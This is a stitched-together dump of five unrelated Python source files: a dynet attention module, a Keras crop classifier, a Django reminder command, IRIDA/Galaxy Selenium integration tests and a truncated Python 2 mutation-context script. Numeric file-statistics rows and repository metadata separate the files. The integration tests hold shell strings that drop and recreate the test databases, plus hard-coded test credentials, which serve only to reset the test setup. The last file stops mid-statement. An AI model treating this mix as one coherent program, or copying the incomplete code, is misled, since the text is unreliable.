"""Contains classes for computing and keeping track of attention distributions. """ from collections import namedtuple import dynet as dy import dynet_utils as du class AttentionResult(namedtuple('AttentionResult', ('scores', 'distribution', 'vector'))): """Stores the result of an attention calculation.""" __slots__ = () class Attention(): """Attention mechanism class. Stores parameters for and computes attention. Attributes: transform_query (bool): Whether or not to transform the query being passed in with a weight transformation before computing attentino. transform_key (bool): Whether or not to transform the key being passed in with a weight transformation before computing attentino. transform_value (bool): Whether or not to transform the value being passed in with a weight transformation before computing attentino. key_size (int): The size of the key vectors. value_size (int): The size of the value vectors. the query or key. query_weights (dy.Parameters): Weights for transforming the query. key_weights (dy.Parameters): Weights for transforming the key. value_weights (dy.Parameters): Weights for transforming the value. """ def __init__(self, model, query_size, key_size, value_size): self.key_size = key_size self.value_size = value_size self.query_weights = du.add_params( model, (query_size, self.key_size), "weights-attention-q") def transform_arguments(self, query, keys, values): """ Transforms the query/key/value inputs before attention calculations. Arguments: query (dy.Expression): Vector representing the query (e.g., hidden state.) keys (list of dy.Expression): List of vectors representing the key values. values (list of dy.Expression): List of vectors representing the values. Returns: triple of dy.Expression, where the first represents the (transformed) query, the second represents the (transformed and concatenated) keys, and the third represents the (transformed and concatenated) values. """ assert len(keys) == len(values) all_keys = dy.concatenate(keys, d=1) all_values = dy.concatenate(values, d=1) assert all_keys.dim()[0][0] == self.key_size, "Expected key size of " + \ str(self.key_size) + " but got " + str(all_keys.dim()[0][0]) assert all_values.dim()[0][0] == self.value_size query = du.linear_transform(query, self.query_weights) if du.is_vector(query): query = du.add_dim(query) return query, all_keys, all_values def __call__(self, query, keys, values=None): if not values: values = keys query_t, keys_t, values_t = self.transform_arguments(query, keys, values) scores = dy.transpose(query_t * keys_t) distribution = dy.softmax(scores) context_vector = values_t * distribution return AttentionResult(scores, distribution, context_vector)
39.781609
86
0.608206
397
3,461
5.161209
0.27204
0.02733
0.021474
0.023426
0.321132
0.271352
0.252806
0.144461
0.144461
0.099561
0
0.003377
0.315516
3,461
86
87
40.244186
0.861545
0.445247
0
0
0
0
0.050257
0
0
0
0
0
0.076923
1
0.076923
false
0
0.076923
0
0.282051
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f5c968619741d599aec34b3b7698daeeb82d4a
2,655
py
Python
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
2
2021-04-21T07:26:01.000Z
2021-04-21T07:26:17.000Z
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
null
null
null
v0/hack1.py
dhvakr/Farm-Hub---Hackverse-2021
3444c16dc792a3d533a071f41d53b7b9efbf0a78
[ "MIT" ]
2
2021-05-21T08:44:41.000Z
2021-07-16T14:59:24.000Z
# -*- coding: utf-8 -*- """ Created on Saturday - 2021 @author: DIVAKARAN """ import pandas as pd import numpy as np from sklearn import preprocessing from sklearn.linear_model import LogisticRegression from sklearn.model_selection import cross_val_score from keras.models import Sequential from keras.layers import Activation from keras.optimizers import SGD from keras.layers import Dense df = pd.read_csv("final.csv") le = preprocessing.LabelEncoder() l1 = df["Soil"] le.fit(l1) newsoil = le.transform(l1) df["Soil"]=newsoil l2 = df["Month"] le.fit(l2) df["Month"]=le.transform(l2) l3 = df["State"] le.fit(l3) df["State"]=le.transform(l3) #df=df.iloc[:,1:] df = pd.DataFrame(data = df.iloc[:,1:].values, columns=["Soil","Month","State","Rice","Wheat","Cotton","Sugarcane","Tea","Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"]) #print(df) feat = pd.DataFrame({"Soil": df["Soil"], "Month" : df["Month"], "State": df["State"]}) labels = pd.DataFrame(data=df.iloc[:,3:],columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"]) #print(df) from keras.utils import np_utils from sklearn.model_selection import train_test_split (trainData, testData, trainLabels, testLabels) = train_test_split(feat, labels, test_size=0.25, random_state=42) print(trainData.values) model = Sequential() model.add(Dense(15, input_dim=3, init="uniform",activation="sigmoid")) """ model.add(Dense(10, input_dim=3, init="uniform",activation="relu")) print(model.output) model.add(Dense(15, init="uniform", activation="relu")) print(model.output) model.add(Activation("sigmoid")) print(model.output) print(model.summary()) """ #trainLabels = trainLabels.reshape((-1, 1)) print(trainData.shape, testData.shape, trainLabels.shape, testLabels.shape) sgd = SGD(lr=0.01) model.compile(loss="binary_crossentropy", optimizer=sgd, metrics=["accuracy"]) model.fit(trainData.values, trainLabels.values, epochs=500, batch_size=10, verbose=1) (loss, accuracy) = model.evaluate(testData.values, testLabels.values, batch_size=40, verbose=1) print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss,accuracy * 100)) pred = model.predict_proba(testData.values) df = pd.DataFrame(pred, columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"]) print(df) #df['image_name'] = test_id """ newhh=df[['image_name','Type_1','Type_2','Type_3']] newhh.to_csv('submission.csv', index=False) """
34.480519
215
0.698682
364
2,655
5.024725
0.35989
0.024604
0.024604
0.039366
0.296884
0.240022
0.218699
0.218699
0.218699
0.165118
0
0.021821
0.102448
2,655
77
216
34.480519
0.745699
0.064407
0
0
0
0
0.207234
0
0
0
0
0
0
1
0
false
0
0.282051
0
0.282051
0.102564
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f5e77d5e735a8f18f4fdcee74e3f414905ae28
1,978
py
Python
app/base/management/commands/send_reminder.py
Sovol2018/sovolo
54250e42b4af3391d2f99690f45b93ab240563c2
[ "MIT" ]
2
2017-06-06T11:34:49.000Z
2017-10-24T13:09:50.000Z
app/base/management/commands/send_reminder.py
Sovol2018/sovolo
54250e42b4af3391d2f99690f45b93ab240563c2
[ "MIT" ]
346
2016-08-09T20:50:57.000Z
2018-08-28T06:52:17.000Z
app/base/management/commands/send_reminder.py
hejob/sovolo
8b73253d7bf0427c7ae0ebb6d8e3d70e118e8427
[ "MIT" ]
3
2017-11-27T14:07:57.000Z
2018-08-13T15:51:01.000Z
# -*- coding: utf-8 -*- from django.core.management.base import BaseCommand from django.template.loader import get_template from event.models import Event, Frame from base.utils import send_template_mail from django.utils import timezone import datetime import sys import io sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8') class Command(BaseCommand): help = """ 以下の動作をします。毎日午前9時に一度実行されることを想定しています。 - 翌日開催or翌日登録締切のボランティア参加者にリマインダーを送る """ from_address = "reminder@sovol.moe" def handle(self, *args, **options): self.stdout.write("running...") today = datetime.datetime.combine( datetime.date.today(), datetime.time(0, 0, tzinfo=timezone.LocalTimezone()) ) reminder_template = get_template("email/reminder.txt") reminder_events = Event.objects.filter( start_time__gte=today + datetime.timedelta(days=1), start_time__lt=today + datetime.timedelta(days=2), ) for event in reminder_events: for user in event.participant.all(): send_template_mail( reminder_template, {'user': user, 'event': event}, self.from_address, [user.email] ) deadline_template = get_template("email/deadline.txt") deadline_frames = Frame.objects.filter( deadline__gte=today + datetime.timedelta(days=1), deadline__lt=today + datetime.timedelta(days=2), ) for frame in deadline_frames: if frame.event not in reminder_events: for user in frame.participant.all(): send_template_mail( deadline_template, {'user': user, 'event': frame.event}, self.from_address, [user.email] ) self.stdout.write("success...!")
34.103448
66
0.58999
202
1,978
5.623762
0.361386
0.068662
0.077465
0.091549
0.257042
0.204225
0.056338
0
0
0
0
0.006598
0.310415
1,978
57
67
34.701754
0.826246
0.010617
0
0.122449
0
0
0.093095
0.034271
0
0
0
0
0
1
0.020408
false
0
0.163265
0
0.244898
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99f8789335127ad626aebedbfb8f6b1f855bca1b
18,797
py
Python
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
6
2015-11-24T21:51:54.000Z
2022-03-09T15:08:52.000Z
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
16
2016-11-22T14:20:15.000Z
2021-12-20T21:28:28.000Z
irida_import/tests/integration/test_irida_import_int.py
phac-nml/irida-galaxy-importer
8b85bad43272d523f6b0cf50d9fcce355d3b966e
[ "Apache-2.0" ]
2
2019-07-12T20:10:30.000Z
2019-09-26T20:52:17.000Z
import socket import getpass import inspect import time import sys import logging import os import configparser import pytest import subprocess from tempfile import mkdtemp from selenium import webdriver from selenium.common.exceptions import NoSuchElementException from selenium.common.exceptions import StaleElementReferenceException from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from ...irida_import import IridaImport from . import util from requests_oauthlib import OAuth2Session from oauthlib.oauth2 import LegacyApplicationClient from bioblend import galaxy # These variables are to stop Galaxy and Irida from being changed # during script execution. This is required if you are using your # own instance of Galaxy and Irida. # os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL'] = "1" # os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY'] = "1" # os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY'] = "1" # os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA'] = "1" class TestIridaImportInt: """ Perform integration tests on the IRIDA import tool for Galaxy To use an already running instance of Galaxy on port 8888, installation must be disabled, in addition to Galaxy starting/stopping """ TIMEOUT = 600 # seconds GALAXY_SLEEP_TIME = 360 USER = getpass.getuser() EMAIL = 'irida@irida.ca' GALAXY_PASSWORD = 'Password1' GALAXY_DOMAIN = 'localhost' GALAXY_CMD = ['bash', 'run.sh', '--daemon'] GALAXY_STOP = ['bash', 'run.sh', '--stop-daemon'] GALAXY_DB_RESET = 'echo "drop database if exists galaxy_test; create database galaxy_test;" | psql' IRIDA_DOMAIN = 'localhost' IRIDA_PORT = 8080 IRIDA_URL = 'http://' + IRIDA_DOMAIN + ':' + str(IRIDA_PORT) IRIDA_CMD = ['mvn', 'clean', 'jetty:run', '-Djdbc.url=jdbc:mysql://localhost:3306/irida_test', '-Djdbc.username=test', '-Djdbc.password=test', '-Dliquibase.update.database.schema=true', '-Dhibernate.hbm2ddl.auto=', '-Dhibernate.hbm2ddl.import_files='] IRIDA_STOP = 'mvn jetty:stop' IRIDA_DB_RESET = 'echo ' \ '"drop database if exists irida_test;' \ 'create database irida_test;' \ '"| mysql -u test -ptest' IRIDA_PASSWORD_ID = 'password_client' IRIDA_AUTH_CODE_ID = 'auth_code_client' IRIDA_REDIRECT_URI = IRIDA_URL + '/galaxy/auth_code' IRIDA_USER = 'admin' IRIDA_PASSWORD = 'Password1!' IRIDA_TOKEN_ENDPOINT = IRIDA_URL + '/api/oauth/token' IRIDA_PROJECTS = IRIDA_URL + '/api/projects' IRIDA_GALAXY_MODAL = 'galaxy-modal' WAIT = 120 INSTALL_EXEC = 'install.sh' # Sequence files accessed by IRIDA's REST API will not exist when the # tool attempts to access them if they were not uploaded as valid sequence # files FASTQ_CONTENTS = ( "@SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" + "TTGCCTGCCTATCATTTTAGTGCCTGTGAGGTGGAGATGTGAGGATCAGT\n" + "+SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" + "hhhhhhhhhhghhghhhhhfhhhhhfffffe`ee[`X]b[d[ed`[Y[^Y") def setup_class(self): """Initialize class variables, install IRIDA, Galaxy, and the tool""" module_dir = os.path.dirname(os.path.abspath(__file__)) self.SCRIPTS = os.path.join(module_dir, 'bash_scripts') self.REPOS_PARENT = module_dir self.REPOS = os.path.join(module_dir, 'repos') self.TOOL_DIRECTORY = os.path.dirname(inspect.getfile(IridaImport)) self.CONFIG_PATH = os.path.join(self.TOOL_DIRECTORY, 'tests', 'integration', 'repos', 'galaxy', 'tools', 'irida-galaxy-importer', 'irida_import', 'config.ini') self.GALAXY = os.path.join(self.REPOS, 'galaxy') self.IRIDA = os.path.join(self.REPOS, 'irida') log = logging.getLogger() log.setLevel(logging.DEBUG) log_out = logging.StreamHandler(sys.stdout) log_out.setLevel(logging.DEBUG) formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') log_out.setFormatter(formatter) log.addHandler(log_out) self.log = log try: os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL'] self.GALAXY_PORT = 8080 self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str( self.GALAXY_PORT) except KeyError: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(('', 0)) self.GALAXY_PORT = sock.getsockname()[1] self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str( self.GALAXY_PORT) # Install IRIDA, Galaxy, and the IRIDA export tool: exec_path = os.path.join(self.SCRIPTS, self.INSTALL_EXEC) install = subprocess.Popen([exec_path, self.TOOL_DIRECTORY, str(self.GALAXY_PORT)], cwd=self.REPOS_PARENT) install.wait() # Block untill installed @pytest.fixture(scope='class') def driver(self, request): """Set up the Selenium WebDriver""" driver = webdriver.Chrome() driver.implicitly_wait(1) driver.set_window_size(1024, 768) def finalize_driver(): driver.quit() request.addfinalizer(finalize_driver) return driver @pytest.fixture(scope='class') def setup_irida(self, request, driver): """Set up IRIDA for tests (Start if required, register, log in)""" def stop_irida(): print('Stopping IRIDA nicely') stopper = subprocess.Popen(self.IRIDA_STOP, cwd=self.IRIDA, shell=True) stopper.wait() try: os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA'] except KeyError: stop_irida() # create temporary directories for IRIDA data data_dir = mkdtemp(prefix='irida-tmp-') sequence_file_dir = mkdtemp(prefix='sequence-files-', dir=data_dir) reference_file_dir = mkdtemp(prefix='reference-files-', dir=data_dir) output_file_dir = mkdtemp(prefix='output-files-', dir=data_dir) self.IRIDA_CMD.append('-Dsequence.file.base.directory=' + sequence_file_dir) self.IRIDA_CMD.append('-Dreference.file.base.directory=' + reference_file_dir) self.IRIDA_CMD.append('-Doutput.file.base.directory=' + output_file_dir) subprocess.call(self.IRIDA_DB_RESET, shell=True) FNULL = open(os.devnull, 'w') subprocess.Popen(self.IRIDA_CMD, cwd=self.IRIDA, env=os.environ,stdout=FNULL) util.wait_until_up(self.IRIDA_DOMAIN, self.IRIDA_PORT, self.TIMEOUT) def finalize_irida(): stop_irida() request.addfinalizer(finalize_irida) self.register_irida(driver) self.add_irida_client_password(driver) self.add_irida_client_auth_code(driver) self.configure_irida_client_secret(driver) # Return an OAuth 2.0 authorized session with IRIDA return self.get_irida_oauth(driver) @pytest.fixture(scope='class') def setup_galaxy(self, request, driver): """Set up Galaxy for tests (Start if required, register, log in)""" def stop_galaxy(): try: os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY'] except KeyError: print('Killing Galaxy') subprocess.Popen(self.GALAXY_STOP, cwd=self.GALAXY) try: os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY'] except KeyError: stop_galaxy() subprocess.call(self.GALAXY_DB_RESET, shell=True) subprocess.Popen(self.GALAXY_CMD, cwd=self.GALAXY) self.log.debug("Waiting for Galaxy database migration [%s]. Sleeping for [%s] seconds", self.GALAXY_URL, self.GALAXY_SLEEP_TIME) time.sleep(self.GALAXY_SLEEP_TIME) self.log.debug("Galaxy database migration should have (hopefully) finished, checking if it is up") util.wait_until_up( self.GALAXY_DOMAIN, self.GALAXY_PORT, self.TIMEOUT) self.log.debug("Galaxy should now be up on [%s]", self.GALAXY_URL) def finalize_galaxy(): stop_galaxy() request.addfinalizer(finalize_galaxy) self.register_galaxy(driver) self.configure_galaxy_api_key(driver) self.configure_tool('Galaxy', 'galaxy_url', self.GALAXY_URL) def test_galaxy_configured(self, setup_galaxy, driver): """Verify that Galaxy is accessible""" driver.get(self.GALAXY_URL) def test_irida_configured(self, setup_irida, driver): """Verify that IRIDA is accessible""" driver.get(self.IRIDA_URL) def test_tool_visible(self, setup_galaxy, driver): """Make sure there is a link to the tool in Galaxy""" driver.get(self.GALAXY_URL) driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click() assert (driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]")) def register_galaxy(self, driver): """Register with Galaxy, and then attempt to log in""" driver.get(self.GALAXY_URL) driver.find_element_by_link_text("Login or Register").click() driver.find_element_by_id("register-toggle").click() driver.find_element_by_name("email").send_keys(self.EMAIL) driver.find_element_by_name("password").send_keys("Password1") driver.find_element_by_name("confirm").send_keys( "Password1") driver.find_element_by_name("username").send_keys("irida-test") driver.find_element_by_name("create").click() try: driver.get(self.GALAXY_URL) driver.find_element_by_link_text("Login or Register").click() driver.find_element_by_name("login").send_keys(self.EMAIL) driver.find_element_by_name("password").send_keys("Password1") driver.find_element_by_name("login").click() except NoSuchElementException: pass def configure_galaxy_api_key(self, driver): """Make a new Galaxy admin API key and configure the tool to use it""" gal = galaxy.GalaxyInstance(self.GALAXY_URL, email=self.EMAIL, password=self.GALAXY_PASSWORD) self.configure_tool('Galaxy', 'admin_key', gal.key) print('key:' + gal.key) def configure_tool(self, section, option, value): """Write tool configuration data""" config = configparser.ConfigParser() config.read(self.CONFIG_PATH) config.set(section, option, value) with open(self.CONFIG_PATH, 'w') as config_file: config.write(config_file) def register_irida(self, driver): """Register with IRIDA if neccessary, and then log in""" driver.get(self.IRIDA_URL) self.login_irida(driver, 'admin', 'password1') # Set a new password if necessary try: driver.find_element_by_name( "password").send_keys(self.IRIDA_PASSWORD) driver.find_element_by_name( "confirmPassword").send_keys(self.IRIDA_PASSWORD) driver.find_element_by_xpath("//button[@type='submit']").click() except NoSuchElementException: self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD) def login_irida(self, driver, username, password): """Log in to IRIDA (assumes the login page is opened by the driver)""" try: driver.find_element_by_name("username").send_keys(username) driver.find_element_by_name( "password").send_keys(password) driver.find_element_by_xpath("//button[@type='submit']").click() except NoSuchElementException: # If already logged in pass def add_irida_client_auth_code(self, driver): driver.get(self.IRIDA_URL + '/clients/create') driver.find_element_by_id("clientId").send_keys( self.IRIDA_AUTH_CODE_ID) driver.find_element_by_id('authorizedGrantTypes').click() driver.find_element_by_xpath( "//*[contains(text(), 'authorization_code')]").click() driver.find_element_by_name("registeredRedirectUri").send_keys(self.IRIDA_REDIRECT_URI) driver.find_element_by_id("scope_auto_read").click() driver.find_element_by_id("create-client-submit").click() def add_irida_client_password(self, driver): driver.get(self.IRIDA_URL + '/clients/create') driver.find_element_by_id("clientId").send_keys(self.IRIDA_PASSWORD_ID) driver.find_element_by_id("scope_write").click() driver.find_element_by_id("create-client-submit").click() def get_irida_oauth(self, driver): secret = self.get_irida_secret(driver, self.IRIDA_PASSWORD_ID) client = LegacyApplicationClient(self.IRIDA_PASSWORD_ID) irida_oauth = OAuth2Session(client=client) irida_oauth.fetch_token( self.IRIDA_TOKEN_ENDPOINT, username=self.IRIDA_USER, password=self.IRIDA_PASSWORD, client_secret=secret) return irida_oauth def get_irida_secret(self, driver, client_id): """Get an IRIDA client's secret given its client ID """ driver.get(self.IRIDA_URL + '/clients') driver.find_element_by_xpath( "//*[contains(text(), '" + client_id + "')]").click() secret = driver.find_element_by_id( 'client-secret').get_attribute('textContent') return secret def configure_irida_client_secret(self, driver): """Configure the client secret for the tool""" secret = self.get_irida_secret(driver, self.IRIDA_AUTH_CODE_ID) # It is assumed that the tests are being run from the repo's tool # directory: self.configure_tool('IRIDA', 'client_secret', secret) def get_href(self, response, rel): """From a Requests response from IRIDA, get a href given a rel""" links = response.json()['resource']['links'] href = next(link['href'] for link in links if link['rel'] == rel) return href def test_project_samples_import_single_end(self, setup_irida, setup_galaxy, driver, tmpdir): """Verify that sequence files can be imported from IRIDA to Galaxy""" irida = setup_irida project_name = 'ImportProjectSamples' project = irida.post(self.IRIDA_PROJECTS, json={'name': project_name}) samples = self.get_href(project, 'project/samples') sample1 = irida.post(samples, json={'sampleName': 'PS_Sample1', 'sequencerSampleId': 'PS_1'}) sequences1 = self.get_href(sample1, 'sample/sequenceFiles') # Pytest manages the temporary directory seq1 = tmpdir.join("seq1.fastq") seq1.write(self.FASTQ_CONTENTS) irida.post(sequences1, files={'file': open(str(seq1), 'rb')}) seq2 = tmpdir.join("seq2.fastq") seq2.write(self.FASTQ_CONTENTS) irida.post(sequences1, files={'file': open(str(seq2), 'rb')}) sample2 = irida.post(samples, json={'sampleName': 'PS_Sample2', 'sequencerSampleId': 'PS_2'}) sequences2 = self.get_href(sample2, 'sample/sequenceFiles') seq3 = tmpdir.join("seq3.fastq") seq3.write(self.FASTQ_CONTENTS) irida.post(sequences2, files={'file': open(str(seq3), 'rb')}) # Export to Galaxy using the button on the dropdown menu driver.get(self.GALAXY_URL) history_panel = driver.find_element_by_id('current-history-panel') initially_succeeded = len(history_panel.find_elements_by_class_name( 'state-ok')) driver.find_element_by_xpath("//div[@id='Get Data']/a[span[contains(text(), 'Get Data')]]").click() driver.find_element_by_xpath("//a[contains(@class, 'irida_import')]").click() # Sometimes a login is required try: self.login_irida(driver, self.IRIDA_USER, self.IRIDA_PASSWORD) except NoSuchElementException: pass # Pick the last matching project on this page driver.find_elements_by_link_text(project_name)[-1].click() # These checkbox elements cannot be clicked directly # Using IDs would complicate running the tests without restarting IRIDA stale = True timeout = 0 while stale: try: checkboxes = driver.find_elements_by_xpath( "//table[contains(@id, 'samplesTable')]/tbody/tr/td[1]/input[@type='checkbox']") checkboxes[0].click() checkboxes[1].click() stale = False except (StaleElementReferenceException, NoSuchElementException): time.sleep(1) timeout += 1 if timeout == 60: raise driver.find_element_by_id("cart-add-btn").click() driver.find_element_by_id("cart-show-btn").click() email_input = driver.find_element_by_xpath("//form[contains(@class, 'ant-form')]//input[@type='text']") email_input.clear() email_input.send_keys(self.EMAIL) # Click "Export Samples to Galaxy" button driver.find_element_by_xpath("//button[span[text()='Export Samples to Galaxy']]").click() WebDriverWait(driver, self.WAIT).until( EC.presence_of_element_located((By.ID, 'current-history-panel')) ) time.sleep(120) # Wait for import to complete history_panel = driver.find_element_by_id('current-history-panel') succeeded = len(history_panel.find_elements_by_class_name('state-ok')) assert succeeded - initially_succeeded > 0, \ "Import did not complete successfully"
42.915525
116
0.628239
2,213
18,797
5.116132
0.196114
0.035329
0.057057
0.06377
0.33298
0.270889
0.233969
0.215598
0.186804
0.15439
0
0.011421
0.264031
18,797
437
117
43.01373
0.806997
0.117466
0
0.195719
0
0.003058
0.171578
0.059177
0
0
0
0
0.006116
1
0.073395
false
0.079511
0.094801
0
0.266055
0.009174
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
99fe11a820f272f49a922eba7ff98cc3f28aaa1e
14,822
py
Python
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
2
2021-06-02T20:34:27.000Z
2021-09-06T22:36:10.000Z
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
null
null
null
code/sumContext.py
NIEHS/P-MACD
82fa36f6ccbdccb63985d28b0c41c9084b9e2b18
[ "MIT" ]
2
2021-04-03T00:31:13.000Z
2022-01-31T15:40:29.000Z
## This code was developed and authored by Les Klimczak, Ph.D. ## Unauthorized commercial reuse of the code and removal of this notice ## are prohibited. ## This research was supported by the Intramural Research Program of the NIH, ## National Institute of Environmental Health Sciences. import os, re, sys, copy, numpy, datetime, __builtin__ FILESDIR = sys.argv[1] execfile(sys.argv[1] + "findMotifs.py") time40 = datetime.datetime.now() def which(tf): return filter(lambda x: tf[x], range(len(tf))) #def all(tf): # return reduce(lambda x, y: x&y, tf) def duplicated(list): seen = [] duplicated = [] for el in list: if el in seen: duplicated.append(True) else: duplicated.append(False) seen.append(el) return duplicated def ifelse(test, yes, no): if test: return yes else: return no OLDEXT = "_anz4.txt" BATCH = True BATCH = False #CLUSTERANZ = True CLUSTERANZ = False if CLUSTERANZ: OLDEXT = "_cluster.txt" ORIGDIR = "/data/PCAWG_12oct_passonly/MAF_2583/histology_split/A3A_A3B/res_ytCa/" motifString = re.sub('.*/res', '', ORIGDIR)[:-1] sumTitles = ["Sample","A_T_coord_clusters", "G_C_coord_clusters", "Non_coord_clusters", "clusters","mutations", "complex","insertions", "deletions", "indels", "substitutions", "bases"] substTo = {'A':("T","G","C"),'T':("A","C","G"),'G':("C","T","A"),'C':("G","A","T")} colTitles = [] for title in findTitles: if (len(title)==1): mutBase = title else: mutBase = title[which([x<90 for x in [ord(x) for x in title]])[0]] for base in substTo[mutBase]: if (base==mutBase): continue colTitle = title + "_to_" + base colTitles.append(colTitle) colTitles.extend((title, title.lower())) if (len(title)>1): colTitles.extend((title + "_per_mut", title + "_per_" + mutBase, title.lower() + "_per_" + mutBase.lower(), "enrich_" + title, "freq_" + title, "reliable>=30")) headers = sumTitles + colTitles numCols = len(headers) totals = [0] * numCols numFixedCols = 32 def newCounter(type, subtype, sumTitle, sumSubtitle, typeColumn, typeValue, subtypeColumn, subtypeValue, subtypeComparison): type = type subtype = subtype sumTitle = sumTitle sumSubtitle = sumSubtitle typeColumn = typeColumn typeValue = typeValue if (typeValue[1:2]==","): typeValue = typeValue.split(",") subtypeColumn = subtypeColumn subtypeValue = subtypeValue subtypeComparison = subtypeComparison if ((subtypeComparison=="equal") or (subtypeComparison=="greater")): subtypeValue = int(subtypeValue) typeField = [0] subtypeField = [0] # 07/15/16 counters replaced with variants variants = [{}] complex = [{}] clusters = [{}] mutations = [0] mutList = [{}] baseList = [{}] baseCountList = [{}] totals = [0] * numCols output = [""] def initOutput(inputPref): if (type=='99'): typeString = "_" + sumSubtitle outputFile = inputPref + "_sum" + typeString + ".txt" else: typeString = "%02d" % int(type) outputFile = inputPref + "_sum" + typeString + subtype + ".txt" #if (file.exists(outputFile)) next output[0] = open(outputFile, "w") if (type!='99'): output[0].write("#" + sumTitle + " " + sumSubtitle + "\n") output[0].write('\t'.join(headers) + "\n") def closeOutput(): output[0].close() def initFieldNames(fieldNames): typeField[0] = which([x==typeColumn for x in fieldNames]) if (typeField[0]): typeField[0] = typeField[0][0] subtypeField[0] = which([x==subtypeColumn for x in fieldNames]) if (subtypeField[0]): subtypeField[0] = subtypeField[0][0] #print type, subtype, typeColumn, typeField[0], subtypeField[0] def initCounters(mutList0, baseList0, baseCountList0): variants[0] = {} complex[0] = {} clusters[0] = {} mutations[0] = 0 mutList[0] = copy.deepcopy(mutList0) baseList[0] = copy.deepcopy(baseList0) baseCountList[0] = copy.deepcopy(baseCountList0) def count(fields): if (sumTitle!="All Mutations"): #if (not any([x==typeValue for x in fields])): if (__builtin__.type(typeValue) is list): if (not any([x==fields[typeField[0]] for x in typeValue])): return else: if (not fields[typeField[0]]==typeValue): return if subtypeField[0]!=[]: if ((subtypeComparison=="equal") or (subtypeComparison=="greater")): subtypeFieldValue = int(fields[subtypeField[0]]) else: subtypeFieldValue = fields[subtypeField[0]] if (not compare(subtypeFieldValue, subtypeValue, subtypeComparison)): return #if (True): #if (type=="10"): #if ((type!="10")&(fields[typeField]!="N")) { # print lnum, type, subtype, subtypeColumn, subtypeField[0] # typeField, subtypeField #} if (not variants[0].has_key(fields[VARIANT_TYPE_FIELD]) and (fields[COMPLEX_ID_FIELD]=="")): (variants[0])[fields[VARIANT_TYPE_FIELD]] = 1 else: if (fields[COMPLEX_ID_FIELD]==""): (variants[0])[fields[VARIANT_TYPE_FIELD]] = (variants[0])[fields[VARIANT_TYPE_FIELD]] + 1 if (fields[CLUSTER_ID_FIELD]!=""): (clusters[0])[fields[CLUSTER_ID_FIELD]] = fields[CLUSTER_COORD_FIELD] if (fields[COMPLEX_ID_FIELD]!=""): (complex[0])[fields[COMPLEX_ID_FIELD]] = fields[COMPLEX_ID_FIELD] #cat("c", fields[COMPLEX_ID_FIELD], "c") # 04/15/14 change to all non-complex rows if (fields[COMPLEX_ID_FIELD]==""): mutations[0] = mutations[0]+1 if ((fields[COMPLEX_ID_FIELD]=="") and (fields[VARIANT_TYPE_FIELD]=="SNP")): # 04/15/14 change to all non-complex rows #mutations <- mutations+1 # for (title in findTitles[as.logical(as.numeric(fields[fieldNames %in% findTitles]))]) { for title in [findTitles[x] for x in which([bool(x) for x in [int(x) for x in [fields[x] for x in which([x in findTitles for x in fieldNames])]]])]: mutationCount = (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] (mutList[0])[title][fields[TUMOR_SEQ_ALLELE2_FIELD]] = mutationCount + 1 #baseCounts <- as.numeric(fields[fieldNames %in% countTitles]) baseCounts = [int(x) for x in [fields[x] for x in uniqueFieldNumbers]] for i in range(len(baseCounts)): (baseCountList[0])[uniqueFieldNames[i]] = (baseCountList[0])[uniqueFieldNames[i]] + baseCounts[i] else: sys.stdout.write("X") def writeSampleSum(): print " writing sample in row", lnum complex[0] = len((complex[0]).keys()) # translated ifelse won't work b/c it's trying to evaluate the False option if (variants[0].has_key("INS")): insertions = 